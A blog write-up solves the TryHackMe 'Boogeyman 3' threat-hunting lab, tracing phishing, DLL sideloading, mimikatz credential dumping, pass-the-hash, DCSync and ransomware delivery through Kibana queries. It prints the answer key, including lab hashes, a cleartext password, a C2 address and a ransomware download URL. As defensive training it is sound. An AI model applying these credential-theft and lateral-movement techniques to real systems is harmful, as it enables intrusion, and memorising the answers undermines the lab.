Boogeyman 3 — TryHackMe Write-Up

· prosetesting's blog

Threat hunting in an ELK stack: tracing a full attack chain from ISO phishing to ransomware deployment via mimikatz, WinRM and DCSync.

Table of Contents

Boogeyman 3 #

🏴 Platform: TryHackMe
🔬 Category: DFIR / Threat Hunting (ELK)
🟠 Difficulty: Medium
📅 Date: 2026-02-14
✍️ Author: t0nt0n
⏱️ Reading time: ~5 min

Context #

Quick Logistics LLC was targeted by the Boogeyman threat group in a sophisticated attack. The analysis relies on Sysmon and Windows logs ingested into an ELK stack (index winlogbeat-*). The goal: trace the full attack chain from initial phishing to ransomware deployment.

Reconnaissance #

Kibana index: winlogbeat-* Time range: August 29-30, 2023 Machines involved: WKSTN-0051, WKSTN-1327, DC01.quicklogistics.org

Overview — Process Tree #

WKSTN-0051 (evan.hutchinson)
│
├─ iexplore.exe
│  └─ download: ProjectFinancialSummary_Q3.pdf.iso
│     └─ mount ISO → D:\
│
├─ mshta.exe [PID ????]                        ← Q1  HTA execution
│  │  cmd: D:\ProjectFinancialSummary_Q3.pdf.hta
│  │
│  ├─ xcopy.exe                                 ← Q2  Copy DLL to %TEMP%
│  │     D:\review.dat → %TEMP%\review.dat
│  │
│  ├─ rundll32.exe                              ← Q3  DLL sideload
│  │  │  review.dat,DllRegisterServer
│  │  │
│  │  └──── C2: ???.???.???.???:??              ← Q5  C2 callback
│  │
│  └─ powershell.exe                            ← Q4  Persistence
│        schtasks /create "??????"
│
├─ ????????????.exe                              ← Q6  UAC Bypass
│
├─ mimikatz.exe                                 ← Q7  Downloaded from GitHub
│  │  sekurlsa::logonpasswords
│  └─ ????????:????????????????                 ← Q8  Credential dump
│
├─ net use \\WKSTN-1327\ITFiles                 ← Q9  Discovery
│  └─ read: ??????????????.ps1
│     └─ creds: QUICKLOGISTICS\??????????       ← Q10 Cleartext creds
│
└─ Invoke-Command -ComputerName ??????????      ← Q11 Lateral movement

         ??????????
         │
         ├─ ??????????????.exe                   ← Q12 Parent process (WinRM)
         │
         ├─ mimikatz.exe
         │  │  sekurlsa::pth (Pass-the-Hash)
         │  └─ ?????????????:????????????????   ← Q13 Admin hash
         │
         └─ lsadump::dcsync                     ← Q14 DCSync
               account: ????????

                  DC01.quicklogistics.org
                  │
                  └─ powershell.exe
                     │  iwr http://??????????????
                     │      /??????????????.exe         ← Q15
                     │
                     └─ ransomware deployment
                        ├─ WKSTN-0051
                        ├─ WKSTN-1327
                        └─ DC01

Attack Chain #

1. Initial Access — ISO Phishing + HTA (Q1) #

An ISO file containing a double-extension HTA was used to trick the victim.

process.command_line: *.hta*

Result: mshta.exe executes the .pdf.hta payload from the mounted ISO drive. Look for the PID in the Sysmon Event ID 1 log.

Reveal Q1

6392

2. Staging — DLL Payload Copy (Q2) #

process.parent.name: mshta.exe

Three child processes identified:

The xcopy command reveals the full staging path. Check the complete command line.

Reveal Q2

"C:\Windows\System32\xcopy.exe" /s /i /e /h D:\review.dat C:\Users\EVAN~1.HUT\AppData\Local\Temp\review.dat

3. Execution — DLL Sideloading (Q3) #

The malicious DLL is loaded via rundll32.exe with DllRegisterServer as the export function.

Reveal Q3

"C:\Windows\System32\rundll32.exe" D:\review.dat,DllRegisterServer

4. Persistence — Scheduled Task (Q4) #

A scheduled task is created via PowerShell. Filter on schtasks in the command line to find the task name.

Reveal Q4

Review

5. Command & Control (Q5) #

process.name: rundll32.exe AND event.category: network

Look for the destination IP and port in the network connection event from rundll32.exe.

Reveal Q5

165.232.170.151:80

6. Privilege Escalation — UAC Bypass (Q6) #

process.name: (fodhelper.exe OR eventvwr.exe OR computerdefaults.exe OR sdclt.exe)

One of these classic UAC bypass binaries was used.

Reveal Q6

fodhelper.exe

7. Credential Access — Mimikatz (Q7, Q8) #

Search for the mimikatz download:

process.command_line: *github*

The full GitHub URL answers Q7. Then search for sekurlsa::logonpasswords output to find the dumped username:NTLM hash pair for Q8.

Reveal Q7

https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20220919/mimikatz_trunk.zip

Reveal Q8

itadmin:F84769D250EB95EB2D7D8B4A1C5613F2

8. Discovery — Network Share (Q9) #

host.name: WKSTN-0051* AND process.command_line: *\\\\*

A script file was found on a remote share containing cleartext credentials.

Reveal Q9

IT_Automation.ps1

9. Lateral Movement — WinRM (Q10, Q11, Q12) #

The script contains credentials in DOMAIN\user:password format. Search for Invoke-Command to find the target machine, and look for the parent process spawned by WinRM on the target.

Reveal Q10

QUICKLOGISTICS\allan.smith:Tr!ckyP@ssw0rd987

Reveal Q11

WKSTN-1327

Reveal Q12

wsmprovhost.exe

10. Credential Access — Pass-the-Hash + DCSync (Q13, Q14) #

On the second machine, mimikatz is used again with sekurlsa::pth and lsadump::dcsync. Look for the administrator NTLM hash and the account name used for DCSync.

Reveal Q13

administrator:00f80f2538dcb54e7adc715c0e7091ec

Reveal Q14

backupda

11. Actions on Objectives — Ransomware (Q15) #

host.name: DC01* AND process.command_line: (*download* OR *iwr* OR *http*)

The ransomware is downloaded via PowerShell and deployed across all three machines.

Reveal Q15

http://ff.sillytechninja.io/ransomboogey.exe

Tools Used #

What Didn't Work #

Lessons Learned #

#ctf #tryhackme #dfir #threat-hunting #elk #sysmon #mimikatz #ransomware #writeup
last updated: 
⬛⚪⬛
⬛⬛⚪  ☠ user
⚪⚪⚪  rm -rf /ignorance && echo 42 > /dev/brain